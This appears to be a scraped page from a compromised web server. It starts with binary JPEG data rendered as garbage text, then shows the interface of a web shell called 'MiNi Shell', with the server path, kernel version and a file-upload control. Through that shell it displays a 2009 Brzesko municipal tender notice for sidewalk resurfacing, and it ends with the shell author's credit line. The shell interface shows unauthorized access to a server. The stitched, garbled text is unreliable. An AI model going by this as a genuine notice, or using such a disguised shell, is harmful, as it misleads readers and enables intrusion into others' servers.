JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/81395-N-2009.html

<p class="kh_header"><b>Brzesko: Remont nawierzchni chodników w Brzesku</b><br>
<b>Numer ogłoszenia: 81395 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni chodników w Brzesku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana nawierzchni chodników dotyczy następujących miejsc:

1.Pl.Kazimierza Wlk. (str.płdn.od ul.Chopina do ul.Siekiewicza)         -   365m2  
2.ul.Ogrodowa (str.płdn. -kontynuacja)                                       -   184m2 
3.ul.Zielona 						-   185m2 
4.ul.Legionów Piłsudsk.(od ogródka Jord. do Brzezowieckiej)            -   462m2  
5.ul.Piastowska (do ul.Brzegowej)				      -   296m2 
6.ul.Czarnowiejska (od SP2 do ul.Wiejskiej)			      -   400m2  
7.ul.Browarna (od mostu do wjazdu)			 	      -   200m2 
8.ul.Powstańców Warszawy  				     -   430m2
9.ul.Nowa						     -   125m2 
10.ul.Szkolna				 		      -     80m2 
11.chodnik za Domem Nauczyciela                                   	      -     27m2 
Szczegółowy zakres stanowią załącznik Nr 5 SIWZ gdzie każdy chodnik stanowi osobny element rozliczeniowy zadania   oraz Specyfikacja techniczna wykonania i Odbioru robót- Załącznik Nr 10 SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości 10.000 (słownie: dziesięć tysięcy złotych) zgodnie z art. 45 upzp i ust. 8 SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest;
  
    1) być uprawnionym do występowania w obrocie prawnym zgodnie z wymogami   ustawowymi 
       2)dysponować personelem doświadczonym i posiadającym uprawnienia techniczne w zakresie 
           przedmiotu zamówienia,
       3) posiadać niezbędną wiedzę i doświadczenie, potencjał ekonomiczny i techniczny oraz
 personel, wystarczające do wykonania zamówienia- min.8 pracowników +1 osoba nadzoru.
       4) wykonać w okresie ostatnich pięciu latach terminowo i dobrze co najmniej dwa zlecenia o
    podobnym charakterze jak przedmiot zamówienia  (za minimum przyjmuje się wykonanie tego  
     typu robót o łącznej wartości 400.000zł  w  wybranym roku).    
5) dysponować odpowiednim sprzętem technicznym umożliwiającym sprawną realizację   
    zamówienia- jak min. zagęszczarkę, piłę do cięcia betonu, koparkę, samochód ciężarowy, 
6) znajdować się w sytuacji finansowej zapewniającej wykonanie zamówienia,
7) nie podlegać wykluczeniu z postępowania na podstawie art.24, ustawy Pzp,
8) akceptacja  projektu umowy , stanowiącego załącznik Nr 6 niniejszej specyfikacji, która musi być podpisana i  parafowana na każdej stronie  i złożona wraz z ofertą.
 
    Ocena polega m.in. na sprawdzeniu:
    czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, 
    czy wystawiony jest w okresie ustalonym przez prawo (nie póżniej niż wskazano), czy zawiera  
    informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca 
    uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w 
    miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub 
    pełnomocnictwa udzielonego przez osoby uprawnione, czy złożony dokument jest kompletny.

     Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP- 
 14 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla 
     każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu 
    potwierdzenia spełnienia warunków udziału w postępowaniu:

         a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do  
               ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru   
               lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 
               m-cy przed upływem terminu wniosków o dopuszczenie do udziału w postępowaniu o 
               udzielenie zamówienia albo składania ofert,
b) oświadczenie, że Wykonawca nie zalega z opłatami podatków US i składek ZUS,
c)1. wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
    wykonywaniu zamówienia (min.8 pracowników +1osoba nadzoru), 
   2.dokumenty stwierdzające, że osoby które będą wykonywać zamówienie posiadają        
    odpowiednie uprawnienia do prowadzenia tego typu prac budowlanych - dla nadzoru     
    bezpośredniego -  zgodnie z art.12 obowiązującego prawa budowlanego,
   3. pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do  
     wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt c wykonawca wskazał 
    osoby, którymi będzie dysponował,
d) wykaz sprzętu (jako minimum przyjmuje się:1 zagęszczarkę,1 piłę do cięcia betonu,  
    koparkę i samochód ciężarowy), lub pisemnego zobowiązania innych podmiotów do 
    udostępnienia  niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w 
    wykazie o którym wyżej mowa wykonawca wskazał narzędzia i urządzenia, którymi 
    będzie dysponował 
e) wykaz wykonanych w ciągu ostatnich pięciu latach robót budowlanych, odpowiadających   
    swoim rodzajem  i wielkością robotom budowlanym stanowiącym przedmiot  zamówienia,  
    z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem  dokumentów  
    potwierdzających, że roboty te zostały wykonane z należytą  starannością (kopie protokołu   
    odbioru, referencje)- co najmniej 2 o podobnym charakterze, (za minimum 
     przyjmuje się wykonanie tego typu robót o łącznej wartości 400.000zł w  wybranym roku).    
 f) oświadczenie o akceptacji projektu umowy stanowiący zał. nr 6 do niniejszej  
    specyfikacji, wraz z załączonym parafowanym projektem umowy,             
 g) oświadczenie, że Oferent zapoznał się z warunkami przetargu i przyjmuje je bez  zastrzeżeń,
           h) dowód wpłacenia wadium,
      i) oświadczenie o warunkach gwarancji.
           j) wypełniony formularz cenowy stanowiący załącznik do nin. specyfikacji wraz z kosztorysami                       
               ofertowymi.
k)  polisę ubezpieczeniową (w zakresie prowadzonej działalności gospodarczej),
          l) oświadczenia w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
          ł) oświadczenia w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
          m) oświadczenia uzupełniającego  w zależności od statusu prawnego Oferenta w trybie art.   
               24 ust. 1 pkt 4-9 ustawy Pzp - załącznik Nr 3 SIWZ.
          n) oświadczenie o akceptacji projektu umowy na takich warunkach jak we wzorze umowy 
               stanowiącym zał. nr 6 SIWZ.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 2, 3 i 5 Rozporządzenia Prezesa Rady Ministrów  z dnia  19 maja 2006 r. ( DZ. U Nr.87 poz. 605  z późn. zm.):

1. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy prawo zamówień publicznych 

2. Dokumenty, o których mowa w pkt 6 lit. a i c , powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 1 , zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzib´ lub miejsce zamieszkania.
Przepis ust. 2 stosuje się odpowiednio.

W celu potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego, zamawiający może żądać w szczególności rzeczy i zaświadczeń, o których mowa w § 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( DZ. U Nr.87 poz. 605  z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - gwarancja powyżej 3 lat - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51. pokój nr 112, 
telefon 0-14 68 63 100 wew. 124,  wdniach pracy godz.od 7:30 do 15:30 e-mail: zdzislaw.grzegorzek@um.brzesko.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2009 godzina 09:00, miejsce: Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51. pokój nr 101 - Sekretariat Burmistrza Brzeska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com